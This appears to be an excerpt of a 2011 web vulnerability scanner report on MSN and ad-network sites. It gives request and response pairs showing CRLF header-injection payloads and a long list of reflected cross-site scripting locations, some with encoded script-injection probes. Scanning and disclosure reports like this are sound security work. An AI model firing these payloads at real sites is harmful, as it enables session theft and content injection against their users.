FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1394:c4bae
a72d820a2b6;expires=Sun, 30 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=138
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:43 GMT
Connection: close
Content-Length: 3384

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat=',c4bae
a72d
...[SNIP]...

4.15. http://redacted/home.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/home.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4ae1b%0d%0a33d8416c84 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /home.asp?4ae1b%0d%0a33d8416c84=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 02:15:43 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted//?4ae1b
33d8416c84=1
Content-Length: 74

object moved <a href="http://money.msn.com//?4ae1b
33d8416c84=1">here</a>

4.16. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2d5ca%0d%0acb9513cea6b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /investor/home.aspx?2d5ca%0d%0acb9513cea6b=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 29 Jan 2011 23:48:19 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing?2d5ca
cb9513cea6b=1
Content-Length: 83

object moved <a href="http://money.msn.com/investing?2d5ca
cb9513cea6b=1">here</a>

5. Cross-site scripting (reflected) previous next
There are 362 instances of this issue:

http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [&PID parameter]
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [AN parameter]
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [ASID parameter]
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [PG parameter]
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [TargetID parameter]
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [UIT parameter]
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [destination parameter]
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [sz parameter]
http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [TargetID parameter]
http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [sz parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [&PID parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [AN parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [ASID parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [PG parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [PG parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [TargetID parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [UIT parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [destination parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [destination parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [sz parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [AN parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [ASID parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [PG parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [TargetID parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [UIT parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [destination parameter]
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [sz parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [AN parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [AN parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [ASID parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [ASID parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [PG parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [UIT parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [UIT parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [destination parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [destination parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [sz parameter]
http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [sz parameter]
http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [&PID parameter]
http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [AN parameter]
http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [ASID parameter]
http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [PG parameter]
http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [TargetID parameter]
http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [UIT parameter]
http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [destination parameter]
http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [sz parameter]
http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** [REST URL parameter 2]
http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** [REST URL parameter 3]
http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [REST URL parameter 2]
http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [REST URL parameter 3]
http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [click parameter]
http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [&PID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [AN parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [ASID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [PG parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [REST URL parameter 2]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [REST URL parameter 3]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [TargetID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [UIT parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [&PID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [AN parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [ASID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [PG parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [TargetID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [UIT parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [&PID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [AN parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [ASID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [PG parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [TargetID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [UIT parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [&PID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [AN parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [ASID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [PG parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [REST URL parameter 2]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [REST URL parameter 3]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [TargetID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [UIT parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [&PID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [AN parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [ASID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [PG parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [REST URL parameter 2]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [REST URL parameter 3]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [TargetID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [UIT parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [&PID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [AN parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [ASID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [PG parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [REST URL parameter 2]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [REST URL parameter 3]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [TargetID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [UIT parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [&PID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [AN parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [ASID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [PG parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [TargetID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [UIT parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [&PID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [AN parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [ASID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [PG parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [REST URL parameter 2]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [REST URL parameter 3]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [TargetID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [UIT parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [&PID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [AN parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [ASID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [PG parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [REST URL parameter 2]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [REST URL parameter 3]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [TargetID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [UIT parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [&PID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [AN parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [ASID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [PG parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [REST URL parameter 2]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [REST URL parameter 3]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [TargetID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [UIT parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [name of an arbitrarily supplied request parameter]
http://alex-johnson.newsvine.com/ [name of an arbitrarily supplied request parameter]
http://api.bing.com/qsonhs.aspx [&q parameter]
http://api.bing.com/qsonhs.aspx [q parameter]
http://ar.voicefive.com/b/rc.pli [func parameter]
http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter]
http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter]
http://athima-chansanchai.newsvine.com/ [name of an arbitrarily supplied request parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://bodyodd.msnbc.redacted/ [name of an arbitrarily supplied request parameter]
http://boyle.newsvine.com/ [name of an arbitrarily supplied request parameter]
http://cartoonblog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]
http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]
http://cdn-forums.scout.com/adfeed.ashx [callback parameter]
http://cosmiclog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]
http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [c parameter]
http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [name of an arbitrarily supplied request parameter]
http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [q parameter]
http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [q parameter]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [l parameter]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]
http://digg.com/search [REST URL parameter 1]
http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 4]
http://engine2.adzerk.net/z/8277/adzerk1_2_4_43,adzerk2_2_17_45 [keywords parameter]
http://helenaspopkin.newsvine.com/ [name of an arbitrarily supplied request parameter]
http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
http://ingame.msnbc.redacted/ [name of an arbitrarily supplied request parameter]
http://investing.money.redacted/investments/charts [Symbol parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
https://login.silverlight.net/login/signin.aspx [returnurl parameter]
https://login.silverlight.net/login/signin.aspx [returnurl parameter]
http://michaelwann.newsvine.com/ [name of an arbitrarily supplied request parameter]
http://redacted/investor/charts/chartdl.aspx [symbol parameter]
http://redacted/investor/charts/chartdl.aspx [symbol parameter]
http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [name of an arbitrarily supplied request parameter]
http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420 [name of an arbitrarily supplied request parameter]
http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911 [name of an arbitrarily supplied request parameter]
http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911 [name of an arbitrarily supplied request parameter]
http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911 [name of an arbitrarily supplied request parameter]
http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911 [name of an arbitrarily supplied request parameter]
http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911 [name of an arbitrarily supplied request parameter]
http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ [GT1 parameter]
http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ [name of an arbitrarily supplied request parameter]
http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911 [name of an arbitrarily supplied request parameter]
http://openchannel.msnbc.redacted/ [name of an arbitrarily supplied request parameter]
http://openchannel.msnbc.redacted/_vine/printer [path parameter]
http://photoblog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]
http://photoblog.msnbc.redacted/_vine/printer [path parameter]
http://polls.newsvine.com/favicon.ico [REST URL parameter 1]
http://recruiting.scout.com/a.z [c parameter]
http://recruiting.scout.com/a.z [c parameter]
http://recruiting.scout.com/a.z [name of an arbitrarily supplied request parameter]
http://redtape.newsvine.com/ [name of an arbitrarily supplied request parameter]
http://s18.sitemeter.com/js/counter.asp [site parameter]
http://s18.sitemeter.com/js/counter.js [site parameter]
http://suzanne-choney.newsvine.com/ [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing- [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/_news/2010/08/26/4975799-big-facebook-sues-little-teachbook [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/_nv/more/section/archive [REST URL parameter 3]
http://technolog.msnbc.redacted/_nv/more/section/archive [REST URL parameter 4]
http://technolog.msnbc.redacted/_vine/printer [path parameter]
http://technolog.msnbc.redacted/amazon [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/app-store [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/blackberry [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/ces-2011 [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/citizen-gamer [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/facebook [name of an arbitrarily supplied request parameter]
